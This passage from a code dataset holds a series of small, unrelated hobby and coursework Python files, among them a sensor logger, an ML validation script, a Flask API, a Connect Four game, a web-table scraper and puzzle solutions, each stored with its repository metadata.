exp_(pred_year,*param)\nplt.plot(pred_year,capred,label=\"prediction\")\nplt.legend()\nplt.show()\n","repo_name":"fahad-roshan/ADS_ass_3","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":9107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10988197042","text":"fdata = '/home/astroberry/python/.tempdata.dat'\n\nfrom allsky.DHTsensor import *\nimport time, datetime\n\ndef WriteData():\n timestring = datetime.datetime.now().strftime(\"%Y %m %d %H %M %S\")\n hum, temp = GetTempAndHumSafe(5)\n data = \"%s %1.1f %1.1f\\n\"%(timestring, hum, temp)\n with open(fdata, \"a\") as f:\n f.write(data)\n\nwhile 1:\n WriteData()\n time.sleep(5)\n\n\n","repo_name":"CerecedaObs/AllSky","sub_path":"scripts/WriteTempData.py","file_name":"WriteTempData.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15356528328","text":"import os\nimport torchvision\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom dataset import SkinDetectionDataset\nfrom skindetectionnet import SkinDetectionNet\nfrom utils import *\n\nwriter = SummaryWriter()\n\n# get our dataset\nroot_dir = r'.\\dataset'\ndataset_val = SkinDetectionDataset(root_dir, 'val')\n\n# indices = torch.randperm(len(dataset)).tolist()\n# dataset_train = torch.utils.data.Subset(dataset, indices[:5])\n# dataset_test = torch.utils.data.Subset(dataset, indices[5:])\n\n# load our model and set directory for saving model parameter\nmodel_pth = r'.\\model_pth\\final_epoch_20_2019-12-08 02_38_19.840335.pkl'\n# model_pth = r'.\\model_pth\\final_epoch_20_2019-12-08 01_35_29.027475.pkl'\n\nmodel = SkinDetectionNet()\n\nis_run_in_gpu = True\nif is_run_in_gpu == True:\n device=torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n model=model.to(device)\n\nmodel.eval()\n\n# record start time\nbegin_time = datetime.now()\nprint(\"begin val: \", begin_time)\n\ndata_loader_val = torch.utils.data.DataLoader(dataset_val, batch_size=1, shuffle=False)\n# validate process\nfor i, data in enumerate(data_loader_val):\n\n input, ground_truth = data\n\n if is_run_in_gpu == True:\n input = input.cuda()\n\n val_image_start_time = datetime.now()\n output = model(input.float())\n val_image_end_time = datetime.now()\n\n output = output.squeeze(axis=0)\n\n if is_run_in_gpu == True:\n output = output.cpu().detach()\n\n # calculate iou\n output[output > 0] = 1\n output[output < 0] = 0\n\n output = np.squeeze(output.numpy(), axis=0)\n ground_truth = np.squeeze(ground_truth.numpy(), axis=0)\n iou = calculate_iou(output, ground_truth)\n\n print(\"image:{}, iou:{}, cost time:{}\".format(i, iou, val_image_end_time - val_image_start_time))\n\n source_image_tag = \"image {}/\".format(i)\n writer.add_image(source_image_tag, input.squeeze(dim=0))\n\n ground_truth_tag = \"image {}/ground_truth\".format(i, iou)\n writer.add_image(ground_truth_tag, ground_truth[np.newaxis,:])\n\n val_result_tag = \"image {}/val result/iou: {}\".format(i, iou)\n writer.add_image(val_result_tag, output[np.newaxis,:])\n\nwriter.close()\n\n# record end time\nend_time = datetime.now()\nprint(\"end train: \", end_time)\nprint(\"time cost: 
{}s\".format((end_time-begin_time).seconds))","repo_name":"BingqiangZhou/skin_detection","sub_path":"val.py","file_name":"val.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26634996304","text":"from django.contrib import admin\n\nfrom .models import Question, Answer\n\n\nclass AnswerInline(admin.StackedInline):\n model = Answer\n extra = 10\n\n\nclass QuestionAdmin(admin.ModelAdmin):\n fields = ['title', 'text', 'author']\n inlines = [AnswerInline]\n\n\nadmin.site.register(Question, QuestionAdmin)\n","repo_name":"Leonid-T/Question-Answer-site","sub_path":"ask/qa/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29344947908","text":"import logging\r\nfrom functools import wraps\r\n\r\nfrom flask import Blueprint, request, jsonify, Response\r\n\r\nfrom api.api_except import MyException\r\nfrom helpers import *\r\n\r\napi = Blueprint('api', __name__, url_prefix=\"\")\r\n\r\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\r\n\r\n\r\ndef validate_input(view_function):\r\n @wraps(view_function)\r\n def func(*args, **kwargs):\r\n try:\r\n input_data = request.get_json(silent=True, force=True)\r\n if not input_data:\r\n raise MyException('No input data')\r\n query = input_data.get(\"query\")\r\n if query is None:\r\n raise MyException(\"'query' is a required property\")\r\n # one of: exp, elk, bio\r\n scenario = str(input_data.get(\"scenario\"))\r\n if scenario is None:\r\n raise MyException(\"'scenario' is a required property\")\r\n if scenario not in [con.ELK, con.EXPANDED, con.BIOASQ]:\r\n raise MyException(\"choose from '{}', '{}', '{}' for 'scenario'\".format(con.ELK, con.EXPANDED, con.BIOASQ))\r\n response = view_function(query, scenario)\r\n return response\r\n except MyException as e:\r\n return Response(json.dumps({'error': e.error_msg}), status=400, mimetype='application/json')\r\n return func\r\n\r\n\r\n@api.route('/search', methods=['POST'])\r\n@validate_input\r\ndef read_query(*args):\r\n query = args[0]\r\n scenario = args[1]\r\n res = query_search(query, scenario)\r\n return jsonify(res)\r\n\r\n'''\r\n@api.route('/search-elk', methods=['POST'])\r\ndef search_elk():\r\n input_data = request.get_json(silent=True, force=True)\r\n # queries = input_data.get(\"query\")\r\n if not input_data:\r\n res = {'error': 'No input data'}\r\n return jsonify(res)\r\n query = input_data.get(\"query\")\r\n\r\n docs, meta = query_search(query)\r\n res = dict()\r\n res['docs'] = docs\r\n res['meta'] = meta\r\n return jsonify(res)\r\n\r\n\r\n@api.route('/search-bio', methods=['POST'])\r\ndef search_elk():\r\n input_data = request.get_json(silent=True, force=True)\r\n # queries = input_data.get(\"query\")\r\n if not input_data:\r\n res = {'error': 'No input data'}\r\n return jsonify(res)\r\n query = input_data.get(\"query\")\r\n\r\n docs, meta = query_search(query)\r\n res = dict()\r\n res['docs'] = docs\r\n res['meta'] = meta\r\n return jsonify(res)\r\n'''","repo_name":"xstsp/bio-query-expansion","sub_path":"api/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"2137066646","text":"# Steven Vi 74537668 Duy Lam 61502602 Lab 12 pm-1:50 pm Project 2\r\n# Console 
Version\r\n\r\nimport connectfour\r\n\r\ndef new_game_state():\r\n    return connectfour.new_game()\r\n\r\ndef userInput(game_state: 'GameState'):\r\n    game_board = game_state\r\n    columns = connectfour.BOARD_COLUMNS\r\n##    winner = winner_is_chosen(game_board)\r\n    try:\r\n        while winner_is_chosen(game_board) == connectfour.NONE:\r\n            userInput = input('Input what action you want first then number:\\n').strip().lower()\r\n            usercommand = userInput.split()\r\n            if usercommand[0] == 'drop':\r\n                if (columns >= int(usercommand[1]) > 0):\r\n                    game_board = drop_piece(game_board, int(usercommand[1])-1)\r\n                    print_connectfour = print_board(game_board)\r\n                    current_turn = _game_state_turn(game_board)\r\n            elif usercommand[0] == 'pop':\r\n                if 0 < int(usercommand[1]) <= columns:\r\n                    game_board = pop_piece(game_board, int(usercommand[1])-1)\r\n                    print_connectfour = print_board(game_board)\r\n                    current_turn = _game_state_turn(game_board)\r\n                else:\r\n                    print('The column number you specified is not correct. Try again.')\r\n            else:\r\n                print('ERROR.')\r\n                game_board = game_board\r\n    except connectfour.InvalidMoveError: #This handles when the user is putting in full column or cannot pop at that spot\r\n        print('Action cannot be fulfilled. Try again.')\r\n        game_board = userInput(game_board)\r\n    except ValueError: #This handles the user input when they input the wrong thing.\r\n        print('The second command is not correct. Try again')\r\n        game_board = userInput(game_board)\r\n    except TypeError:\r\n        print('The number you tried to input is a string.')\r\n        game_board = userInput(game_board)\r\n\r\n    finally:\r\n        print('Game is over.')\r\n\r\n\r\ndef drop_piece(game_state: 'GameState', col_num: int):\r\n    new_state = connectfour.drop(game_state, col_num)\r\n    return new_state\r\n\r\ndef pop_piece(game_state: 'GameState', col_num: int):\r\n    new_state = connectfour.pop(game_state, col_num)\r\n    return new_state\r\n\r\ndef print_board(game_state):\r\n    board_state = game_state.board\r\n    columnNum = []\r\n    board = []\r\n\r\n    for i in range(0, connectfour.BOARD_COLUMNS):\r\n        columnNum.append(i+1)\r\n    board.append(columnNum)\r\n    for i in range(0, connectfour.BOARD_ROWS):\r\n        rowList = []\r\n        for a in range(0, connectfour.BOARD_COLUMNS):\r\n            rowList.append(board_state[a][i])\r\n        board.append(rowList)\r\n    for i in range(0, connectfour.BOARD_COLUMNS):\r\n        print(board[0][i], end = ' ')\r\n    print()\r\n\r\n    converted = []\r\n    for i in range(1, len(board)):\r\n        row = []\r\n        for a in range(0, len(board[i])):\r\n            if board[i][a] == 0:\r\n                row.append('.')\r\n            elif board[i][a] == 1:\r\n                row.append('R')\r\n            elif board[i][a] == 2:\r\n                row.append('Y')\r\n        converted.append(row)\r\n    for i in range(0, connectfour.BOARD_ROWS):\r\n        for a in range(0, connectfour.BOARD_COLUMNS):\r\n            print(converted[i][a] , end = ' ')\r\n        print()\r\n\r\n\r\ndef winner_is_chosen(game_state):\r\n    winner = connectfour.winner(game_state)\r\n    return winner\r\n\r\ndef _game_state_turn(game_state: 'GameState'):\r\n    if winner_is_chosen(game_state) == connectfour.NONE:\r\n        if game_state.turn == 1:\r\n            print('It is Red\\'s turn.')\r\n        elif game_state.turn == 2:\r\n            print('It is now Yellow\\'s turn.')\r\n    elif winner_is_chosen(game_state) != connectfour.NONE:\r\n        if winner_is_chosen(game_state) == 1:\r\n            print('Red is the winner.')\r\n        elif winner_is_chosen(game_state) == 2:\r\n            print('Yellow is the winner')\r\n\r\nif __name__ == '__main__':\r\n    new_game = new_game_state()\r\n    
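# Example commands (illustrative): 'drop 4' drops the current player's piece into\r\n    # column 4, 'pop 2' pops the bottom piece from column 2; userInput() loops until a winner.\r\n    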
userInput(new_game)\r\n","repo_name":"dblam/Duy-s-Python-Projects","sub_path":"PYTHON 32/Project 2/Console1.py","file_name":"Console1.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33324593217","text":"from rx.subjects import ReplaySubject\n\nfrom riptide.config import repositories\nfrom riptide.config.document.config import Config\nfrom riptide.config.files import riptide_main_config_file\nfrom riptide_mission_control.graphql_entities.subscriptions.utils import async_in_executor, try_loading_project, \\\n ResultStep\nfrom riptide_mission_control.registry import registry\n\n\n@async_in_executor\nasync def update_repositories_impl(subject: ReplaySubject):\n subject.on_next(ResultStep(\n steps=2,\n current_step=1,\n text=\"Starting repository update...\"\n ))\n try:\n repositories.update(registry().system_config, lambda msg: subject.on_next(ResultStep(\n steps=2,\n current_step=1,\n text=msg\n )))\n except Exception as e:\n subject.on_next(ResultStep(\n steps=2,\n current_step=1,\n text=\"Fatal error during repository update: \" + str(e),\n is_end=True,\n is_error=True\n ))\n subject.on_completed()\n return\n subject.on_next(ResultStep(\n steps=2,\n current_step=2,\n text=\"Reloading configuration...\"\n ))\n\n # Reload system config\n try:\n config_path = riptide_main_config_file()\n system_config = Config.from_yaml(config_path)\n system_config.validate()\n registry.system_config = system_config\n except FileNotFoundError as e:\n subject.on_next(ResultStep(\n steps=2,\n current_step=2,\n text=\"Main config file not found! Could not reload system config.\",\n is_end=True,\n is_error=True\n ))\n except Exception as e:\n subject.on_next(ResultStep(\n steps=2,\n current_step=2,\n text=\"Could not reload system config: \" + str(e),\n is_end=True,\n is_error=True\n ))\n else:\n subject.on_next(ResultStep(\n steps=2,\n current_step=2,\n text=\"Repository update done!\",\n is_end=True\n ))\n finally:\n subject.on_completed()\n\n\n@async_in_executor\nasync def update_images_impl(subject: ReplaySubject, project_name: str):\n subject.on_next(ResultStep(\n steps=1,\n current_step=1,\n text=\"Starting image update...\"\n ))\n\n project = try_loading_project(project_name, subject, 1, 1)\n if not project:\n return\n\n try:\n registry().engine.pull_images(project,\n line_reset=\"\",\n update_func=lambda msg: subject.on_next(\n ResultStep(\n steps=1,\n current_step=1,\n text=msg\n )\n ))\n subject.on_next(ResultStep(\n steps=1,\n current_step=1,\n text=\"Done updating images!\",\n is_end=True\n ))\n except Exception as ex:\n subject.on_next(ResultStep(\n steps=1,\n current_step=1,\n text=\"Error updating an image: \" + str(ex),\n is_end=True,\n is_error=True\n ))\n finally:\n subject.on_completed()\n pass","repo_name":"theCapypara/riptide-mission-control","sub_path":"riptide_mission_control/graphql_entities/subscriptions/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70347576195","text":"import cv2 # python-opencv\nimport numpy as np\n\n\nprint(\"Координаты точки A(x1;y1):\")\nx1 = int(input(\"\\tx1 = \"))\ny1 = int(input(\"\\ty1 = \"))\n\nprint(\"Координаты точки B(x2;y2):\")\nx2 = int(input(\"\\tx2 = \"))\ny2 = int(input(\"\\ty2 = \"))\n\nimg = np.zeros((512, 512, 3), np.uint8)\n\n\ncv2.line(img, (x1, y1), (x2, y2), (255, 0, 0), 3, cv2.LINE_8)\ncv2.imshow(\"line\", 
img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nprint(\"Уравнение прямой, проходящей через эти точки:\")\nk = (y1 - y2) / (x1 - x2)\nb = y2 - k*x2\nprint(\" y = %.2f*x + %.2f\" % (k, b))\n","repo_name":"alisanaydenysheva/StudyPractice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22952036473","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport cgi\r\nimport sys\r\nimport codecs\r\nimport html\r\nimport crawlerfile\r\nimport imp\r\nimport urllib\r\nimport urllib.request\r\nimport os\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urljoin\r\nfrom urllib.parse import urlparse\r\nimport postgresql\r\nimport sqlite3\r\nignorewords=set(['the','of','to','and','a','in','is','it'])\r\nsys.stdout = codecs.getwriter(\"utf-8\")(sys.stdout.detach())\r\n\r\nform = cgi.FieldStorage()\r\ntext1 = form.getfirst(\"TEXT_1\", \"не задано\")\r\ntext1=text1.lower()\r\n#text2 = form.getfirst(\"TEXT_2\", \"не задано\")\r\ntext1 = html.escape(text1)\r\n#text2 = html.escape(text2)\r\n\r\ne=crawlerfile.searcher('searchindex.db')\r\ntry:\r\n qq=e.queryvid(text1)\r\n q1=qq[0]\r\n q2=qq[1]\r\n q3=qq[2]\r\nexcept:\r\n pass\r\n\r\nprint(\"Content-type: text/html\\n\")\r\nprint(\"\"\"\r\n\r\n\r\n\r\nОбработка данных форм\r\n\r\n\r\n\r\n^Наверх\r\n
\r\n\r\n
\r\n
\r\n \r\n
\r\n
\r\n\tEnter query\r\n \r\n \r\n
\r\n \"\"\")\r\nfor i in q2[0]:\r\n if (i[0].find('embed') == -1):\r\n continue\r\n else:\r\n print(\"\"\"\"\"\".format(i[0]))\r\n print(\"

{}

\".format(format(q3[0])))\r\n print(\"
\")\r\nprint(\"\"\"\r\n\r\n\r\n\"\"\")\r\n\r\n\r\n\r\n","repo_name":"varchous/Octopoda","sub_path":"cgi-bin/videoquery.py","file_name":"videoquery.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33347130038","text":"import logging\nimport os\nimport sys\n\nfrom PyQt5 import QtGui, QtWidgets, QtCore\n\nlogger = logging.getLogger(__name__)\n\nQG = QtGui\nQW = QtWidgets\nQC = QtCore\n\ncatalogue_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),'icons_catalogue')\n\nclass Icon(QG.QIcon):\n\tdef __init__(self,fileName,*args,**kwargs):\n\t\tpath = os.path.join(catalogue_dir,fileName)\n\t\tsuper(Icon,self).__init__(path,*args,**kwargs)\n\nclass Browser(QW.QListView):\n\tdef __init__(self,*args,**kwargs):\n\t\tsuper(Browser,self).__init__(*args,**kwargs)\n\t\tself.model = QG.QStandardItemModel()\n\n\t\tself.setViewMode(QW.QListView.IconMode)\n\t\tself.setModel(self.model)\n\n\t\tself.setGridSize(QC.QSize(64,64))\n\t\tself.setFlow(QW.QListView.LeftToRight)\n\t\tself.setResizeMode(QW.QListView.Adjust)\n\n\t\tself.buildModel()\n\n\tdef buildModel(self):\n\t\tfor f in sorted(os.listdir(catalogue_dir)):\n\t\t\tif f.split('.')[-1].upper() == 'SVG':\n\t\t\t\titem = QtGui.QStandardItem()\n\t\t\t\titem.setIcon(Icon(f))\n\t\t\t\titem.setText(f)\n\n\t\t\t\tself.model.appendRow(item)\n\nif __name__ == \"__main__\":\n\tapp = QW.QApplication([])\n\tbrowser = Browser()\n\tbrowser.show()\n\n\tsys.exit(app.exec_())","repo_name":"nanoMFG/GSAMain","sub_path":"src/gresq/util/icons.py","file_name":"icons.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"15581926119","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport pandas as pd\n\nurl = 'https://en.wikipedia.org/wiki/List_of_S%26P_500_companies'\ndata = requests.get(url)\nif str(data)=='':\n print(\"The web page is loaded successfully\")\n#load data into soup variable\nsoup = BeautifulSoup(data.text, 'html.parser')\n\n#find table and table data\ntable_1 = soup.find('table', {'class':\"wikitable sortable\",'id':\"constituents\"})\ntablebody = table_1.find('tbody')\nssp=[]\nfor i,row in enumerate(tablebody.find_all('tr')):\n if i==0:\n th = row.find_all('th')\n title = [i.text.strip() for i in th]\n else:\n td = row.find_all('td')\n table_row = [i.text.strip() for i in td]\n ssp.append(table_row)\nssp=ssp[::-1]\n\ndf = pd.DataFrame.from_records(ssp)\ndf.columns=title\ndf\n\n##\n#second table\ntable_2 = soup.find('table', {'class':\"wikitable sortable\",'id':'changes'})\ntablebody = table_2.find('tbody')\n\n\nssp2=[]\nfor i,row in enumerate(tablebody.find_all('tr')):\n if i>1:\n td = row.find_all('td')\n table_row = [re.split('.\\d+.\\n', i.text)[0] for i in td]\n ssp2.append(table_row)\nssp2=ssp2[::-1]\n\n##\ndf2 = pd.DataFrame.from_records(ssp2)\ndf2.columns = ['Date', 'Added Ticker', 'Added Security','Removed Ticker ', 'Removed Security', 'Reason']\ndf2\n##\nData_Frames=pd.read_html('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\nData_Frames[0]\n##\nData_Frames[1]\n","repo_name":"SajjadKia/ApiRegex","sub_path":"wikitable.py","file_name":"wikitable.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10019775524","text":"# Bibliotheken laden\nfrom machine import Pin, I2C\nimport 
struct\nimport utime as time\n\nenable_Pin = machine.Pin(16, machine.Pin.OUT, value=0)\n\nfrom I2C.i2c_caen import A7585\n\nDEV_A = A7585(112,20,21)\nDEV_A.startup(80,10,30,2,rampuptime=2)\n\nenable_Pin.value(1)\nDEV_A.SetEnable(True)\n\nprint(\"Setup Done\")\n\ntime.sleep(1)\n\ndef check_I2C():\n Vout = DEV_A.GetVout()\n statusHV = DEV_A.GetHVOn()\n conectionHV = DEV_A.GetConnectionStatus()\n print(\"V:\",Vout,\"HV:\",statusHV,\"Connectivity:\",conectionHV)\n\nwhile True:\n print(DEV_A.GetRampVs())\n print(DEV_A.GetMaxV())\n time.sleep(1.5)\n \n \n\n\n\n","repo_name":"molztim/I2C-A7585D-PicoW","sub_path":"class_test.py","file_name":"class_test.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41433065597","text":"import random\r\nfrom words import words\r\nimport string\r\n\r\n\r\ndef get_word(words):\r\n guess_word = random.choice(words)\r\n return guess_word.upper()\r\n\r\n\r\ndef name_game():\r\n secrete = get_word(words)\r\n secrete_letters = set(secrete)\r\n alphabet = set(string.ascii_uppercase)\r\n typed_letters = set()\r\n lives = (len(secrete_letters) * 2)\r\n\r\n print(\"NAME OF ANIMAL\")\r\n print(\"\")\r\n print(\"You have\", lives, \"tries\")\r\n\r\n while len(secrete_letters) > 0 and lives != 0:\r\n\r\n print(\"\")\r\n wordlist = [letter if letter in typed_letters else \"_\" for letter in secrete]\r\n print(\"Your current word is: \", \" \".join(wordlist))\r\n guess = input(\"Enter a letter: \").upper()\r\n\r\n if guess in alphabet - typed_letters:\r\n typed_letters.add(guess)\r\n if guess in secrete_letters:\r\n secrete_letters.remove(guess)\r\n else:\r\n print(guess, \"is not in the word.\")\r\n lives -= 1\r\n print(\"\")\r\n if lives > 1:\r\n print(\"You have\", lives, \"lives left\")\r\n else:\r\n print(\"You have\", lives, \"live left\")\r\n elif guess in typed_letters:\r\n print(\"You have used this letter\")\r\n else:\r\n print(\"Invalid Input\")\r\n\r\n print(\"you have used letter: \", \",\".join(typed_letters))\r\n\r\n if lives == 0:\r\n print(\"\")\r\n print(\"You lost, the animal name is\", secrete)\r\n else:\r\n print(\"\")\r\n print(\"You WON!!!\")\r\n print(f\"You guessed the animal {secrete} correctly.\")\r\n\r\n\r\nname_game()\r\n","repo_name":"Abasir04/Python","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8232343026","text":"import sys\nimport ctypes as ct\n\nimport libcurl as lcurl\nfrom curltestutils import * # noqa\n\n\ndef main(argv=sys.argv[1:]):\n\n url: str = argv[0] if len(argv) >= 1 else \"localhost\"\n\n curl: ct.POINTER(lcurl.CURL) = lcurl.easy_init()\n\n with curl_guard(False, curl):\n if not curl: return 1\n\n chunk = ct.POINTER(lcurl.slist)()\n # Remove a header curl would otherwise add by itself\n chunk = lcurl.slist_append(chunk, b\"Accept:\")\n # Add a custom header\n chunk = lcurl.slist_append(chunk, b\"Another: yes\")\n # Modify a header curl otherwise adds differently\n chunk = lcurl.slist_append(chunk, b\"Host: example.com\")\n # Add a header with \"blank\" contents to the right of the colon.\n # Note that we are then using a semicolon in the string we pass to curl!\n chunk = lcurl.slist_append(chunk, b\"X-silly-header;\")\n # set our custom set of headers\n lcurl.easy_setopt(curl, lcurl.CURLOPT_HTTPHEADER, chunk)\n lcurl.easy_setopt(curl, lcurl.CURLOPT_URL, 
url.encode(\"utf-8\"))\n lcurl.easy_setopt(curl, lcurl.CURLOPT_VERBOSE, 1)\n\n # Perform the custom request\n res: int = lcurl.easy_perform(curl)\n\n # Check for errors\n if res != lcurl.CURLE_OK:\n handle_easy_perform_error(res)\n\n # free the custom headers\n lcurl.slist_free_all(chunk)\n\n return 0\n\n\nsys.exit(main())\n","repo_name":"karpierz/libcurl","sub_path":"examples/httpcustomheader.py","file_name":"httpcustomheader.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"42960256605","text":"# эта программа нужна для генерации случайной статьи с Диалога\r\n# она открывает json \"номер\" : \"автор и название\"\r\n# ��алее генерирует номер и берет из json-а автора и название по этому номеру\r\n\r\nimport json\r\nfrom random import randint # randint(a, b) генерирует число N такое, что a <= N <= b\r\n\r\nwith open('authors_and_titles_result.json', encoding='utf-8') as file:\r\n at = json.load(file) # сюда выгружаем авторов и названия\r\n\r\nr = randint(1, 326) # сгенерировали число r такое, что 1 <= r <= 326\r\nresult = at[str(r)] # по этому номеру вытащили автора и название\r\nprint('Советуем почитать следующую статью:', result)\r\n","repo_name":"fleur-roar/project-Dialogue-articles","sub_path":"random_article.py","file_name":"random_article.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27444253153","text":"from collections import deque\nwith open(0) as f:\n\tcontent = f.read().strip()\n\tlines = content.splitlines()\n\t# lines.append(\"\")\n\n\nrocks_str = \"\"\"####\n\n.#.\n###\n.#.\n\n..#\n..#\n###\n\n#\n#\n#\n#\n\n##\n##\n\n\"\"\"\n\nrocks = []\ncurrent = []\nfor line in rocks_str.splitlines():\n\tif line in {\"\", \"\\n\"}:\n\t\trocks.append(current)\n\t\tcurrent = []\n\telse:\n\t\tcurrent.append(list(line))\n\nfrom collections import defaultdict\ngrid = defaultdict(lambda: '.')\ndef can_move(coords, symbol):\n\tdx = (-1 if symbol == \"<\" else 1) if symbol in \"<>\" else 0\n\tdy = -1 if symbol == \"down\" else 0\n\tfor i, coord in enumerate(coords):\n\t\tx,y = coord\n\t\tgrid[(x,y)] = '.'\n\tposs = True\n\tfor x, y in coords:\n\t\tif not (0<= x + dx < 7 and 0<= y + dy and grid[(x+dx,y+dy)] == '.'):\n\t\t\tposs = False\n\t\t\tbreak\n\tfor i, coord in enumerate(coords):\n\t\tx,y = coord\n\t\tgrid[(x,y)] = '#'\n\treturn poss\n\t\ndef move(coords, symbol):\n\tdx = (-1 if symbol == \"<\" else 1) if symbol in \"<>\" else 0\n\tdy = -1 if symbol == \"down\" else 0\n\tfor i, coord in enumerate(coords):\n\t\tx,y = coord\n\t\tgrid[(x,y)] = '.'\n\tfor i, coord in enumerate(coords):\n\t\tx,y = coord\n\t\tx += dx\n\t\ty += dy\n\t\tgrid[(x,y)] = '#'\n\t\tcoords[i] = (x,y)\n\nhighest = -1\n\ndef create_new_grid():\n\tdeepest = highest\n\tfor i in range(7):\n\t\tj = highest\n\t\twhile j >= 0:\n\t\t\tdeepest = min(deepest, j)\n\t\t\tif grid.get((i,j)) == \"#\":\n\t\t\t\tbreak\n\t\t\tj -= 1\n\tsubgrid = defaultdict(lambda: '.')\n\tfor i in range(7):\n\t\tfor j in range(highest, deepest-1,-1):\n\t\t\tres = grid.get((i,j))\n\t\t\tif res == \"#\":\n\t\t\t\tsubgrid[(i,j)] = \"#\"\n\treturn subgrid\nnb = 1514285714288 *10\n\ndef to_string():\n\t# l = []\n\ts = \"\"\n\tfor j in range(highest, highest-5, -1):\n\t\tfor i in range(7):\n\t\t\ts += grid[(i,j)]\n\t\t# l.append(s)\n\treturn s\n\ndef display():\n\tfor jj in range(highest, -1,-1):\n\t\ts = \"\"\n\t\tfor ii in range(0, 7):\n\t\t\ts += 
grid.get((ii,jj), '.')\n\t\tprint(s)\n\tprint()\nj = 0\n\npattern = {}\nres = []\nfor i in (range(100000)):\n\tcoords = []\n\tcx = 2\n\tcy = highest + 3 + len(rocks[i%len(rocks)])\n\tprev_highest = highest\n\thighest = cy\n\tprev_j = j\n\tfor l in rocks[i%len(rocks)]:\n\t\tcx = 2\n\t\tfor ch in l:\n\t\t\tif ch == \"#\":\n\t\t\t\tgrid[(cx,cy)] = \"#\"\n\t\t\t\tcoords.append((cx,cy))\n\t\t\tcx += 1\n\t\tcy -= 1\n\n\twhile True:\n\t\tmoved = False\n\t\tif can_move(coords, content[j%len(content)]):\n\t\t\tmove(coords, content[j%len(content)])\n\t\t\tmoved = True\n\t\tj += 1\n\t\tif can_move(coords, \"down\"):\n\t\t\tmove(coords, \"down\")\n\t\t\thighest -= 1\n\t\telse: \n\t\t\tbreak\n\thighest = max(highest, prev_highest)\n\tres.append(highest)\n\tif highest < 5:\n\t\tcontinue\n\tif (to_string(), j%len(content), i%len(rocks)) in pattern:\n\t\tpattern[(to_string(), j%len(content), i%len(rocks))].append((highest, i))\n\t\tif len(pattern[(to_string(), j%len(content), i%len(rocks))]) >= 3:\n\t\t\tps = pattern[(to_string(), j%len(content), i%len(rocks))]\n\t\t\theigh = ps[1][0] - ps[0][0]\n\t\t\tc_l = ps[1][1] - ps[0][1]\n\t\t\tprint(heigh, c_l)\n\t\t\tans = ((1000000000000 - ps[0][1]) // c_l)*heigh + res[ps[0][1] + (1000000000000 - ps[0][1]) % c_l]\n\t\t\tprint(ans)\n\t\t\t# print(j%len(content), i%len(rocks), pattern[(to_string(), j%len(content), i%len(rocks))],i)\n\t\t\tbreak\n\telse:\n\t\tpattern[(to_string(), j%len(content), i%len(rocks))] = [(highest, i)]\n\t\nprint(highest+1)\n","repo_name":"allEyezOnCode/adventofcode","sub_path":"2022/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70204287235","text":"from collections import Counter\nclass Solution:\n def largestPalindromic(self, num: str) -> str:\n num = list(num)\n a = [0,0,0,0,0,0,0,0,0,0]\n c = Counter(num)\n ans=''\n for key,value in c.items():\n a[int(key)]=value\n for i in range(len(a)-1,-1,-1):\n ans+=str(i)*(a[i]//2)\n a[i]%=2\n flag=0\n for i in range(len(a)-1,-1,-1):\n if a[i]==1:\n ans+=str(i)\n flag=1\n break\n ans+=ans[-1-flag::-1]\n ans = ans.strip('0')\n if ans=='':\n ans = max(num)\n return ans\na = Solution()\nprint(a.largestPalindromic(num = \"6006\"))","repo_name":"z369437558/Leetcode","sub_path":"2384.py","file_name":"2384.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18548953145","text":"# COMP9021 